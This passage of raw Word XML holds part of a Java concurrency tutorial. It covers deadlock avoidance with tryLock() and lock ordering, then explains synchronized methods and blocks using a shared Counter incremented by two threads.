      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deadlock Detection</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitor the system to detect deadlocks. If a deadlock is detected, break the cycle of dependency and allow threads to continue executing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B84F81F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Using tryLock() (from ReentrantLock)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of blocking indefinitely while waiting for a lock, use the tryLock() method, which returns immediately if the lock isn't available, allowing you to take other actions, such as retrying after a while or handling the deadlock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172F9BAD" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:ind w:left="720"/>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Lock lock1 = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1873EA3B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:ind w:left="720"/>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Lock lock2 = new ReentrantLock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ED9D9F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C49B7B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:ind w:left="720"/>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if (lock1.tryLock() &amp;&amp; lock2.tryLock()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D726F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:ind w:left="720"/>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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556BE15E" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:ind w:left="720"/>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 Critical section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B1B335" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:ind w:left="720"/>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 finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A34CCDA" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:ind w:left="720"/>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lock1.unlock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A37D72" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:ind w:left="720"/>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lock2.unlock();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6910455E" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:ind w:left="720"/>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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304227E0" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:ind w:left="720"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75009875" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1086"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Avoiding Nested Locks</w:t>
      </w:r>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Try to avoid situations where a thread needs to acquire multiple locks. If multiple locks are necessary, ensure they are acquired in a consistent and predictable order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E5C9C6" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347A81C7" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="002C733C" w:rsidRDefault="00891EBF" w:rsidP="002C733C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C733C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Deadlock is a serious issue in multithreading applications. It occurs when two or more threads wait for each other indefinitely, leading to a system freeze. By understanding the conditions that cause deadlocks and applying strategies to avoid them (such as lock ordering or timeouts), you can ensure smoother operation of your multi-threaded applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619EA5CD" w14:textId="45E9AE00" w:rsidR="00BD73D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BD73D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44C15B6">
          <v:rect id="_x0000_i1816" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B39BDF5" w14:textId="77777777" w:rsidR="006E1A00" w:rsidRPr="00CE4B95" w:rsidRDefault="006E1A00">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="261" w:name="_Toc196307741"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Synchronized Thread?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="261"/>
    </w:p>
    <w:p w14:paraId="1CF4AD0A" w14:textId="04C67095" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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A </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized thread</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java refers to a thread that is executing a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> block of code or method. Synchronization in Java is a mechanism that ensures that a particular section of code can only be accessed by one thread at a time. This is crucial in multithreaded environments to prevent </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>race conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ensure data consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F267B"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When multiple threads access shared resources (like variables, objects, etc.), they can sometimes cause data inconsistency or unexpected behavior due to concurrent access. To solve this issue, we can </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronize</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the critical section of code, ensuring that only one thread can execute that part of the code at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01943253" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How Synchronization Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B5486"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Java provides two ways to synchronize threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C65F44" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Synchronized Method</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A method that is marked with the synchronized keyword. When a thread calls a synchronized method, it acquires a lock on the object (or class) that the method belongs to. This prevents other threads from accessing the same synchronized method on the same object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4176BB" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1087"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Synchronized Block</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A block of code inside a method can be synchronized. This is used when you need finer control over synchronization, for example, when only a part of the method should be synchronized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674968C" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Synchronized Method Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C05A4F"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A synchronized method ensures that only one thread can execute it at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B55319C"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public class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D0E42"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F8C99F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5BDC2F"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 Synchronized method to ensure only one thread can access it at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581AE7FD"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public synchronized void increment() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42CADA"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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6CBCEC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22989EA0" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540A2163"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public int getCount() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AFB4D3"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return count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B8BEAC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187792EB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4C1152" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0741495D"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public class TestSynchronized {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA82EB4"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451498E4"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Counter counter = new Counter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A3314" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC64E59"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 Create multiple threads that will call the increment method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB87C21"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Thread t1 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7EE8FB"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for (int i = 0; i &lt; 1000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BCF412"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counter.increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EC3F5D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3347B10C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605FE02A" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59279E0C"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Thread t2 = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE716B0"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for (int i = 0; i &lt; 1000; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5E4018"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counter.increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCDB09D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD2CFB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B390FE" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28CE4B33"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        t1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D279EB9"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t2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4400E5B7" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71797465"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B733B81"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t1.join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBEA498"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t2.join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BD482B"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 catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5286514B"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E98284"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A40B461" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F54D071"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 Print the final count (should be 2000 if synchronization works correctly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CD6BC7"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System.out.println("Final Count: " + counter.getCount());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAC53E8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401BE856"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD0B3B" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E947DB2" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>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The increment() method is synchronized. This means that even if multiple threads (t1 and t2) call the increment() method, only one thread will be able to execute it at any given time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A6F666" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>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Without synchronization, both threads might update the count variable simultaneously, leading to incorrect results due to race conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D476DA2" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1088"/>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With synchronization, the count will be correctly incremented by each thread, and the final value of count will be 2000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6845E419" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Synchronized Block Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C83D9"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A synchronized block allows you to synchronize only a part of the method, which can be more efficient than synchronizing the whole method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6B03D4"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public class Counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7EE0B6"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private int count = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207F9A55" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A507E27"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public void increment() {</w:t>
      </w:r>
    </w:p>
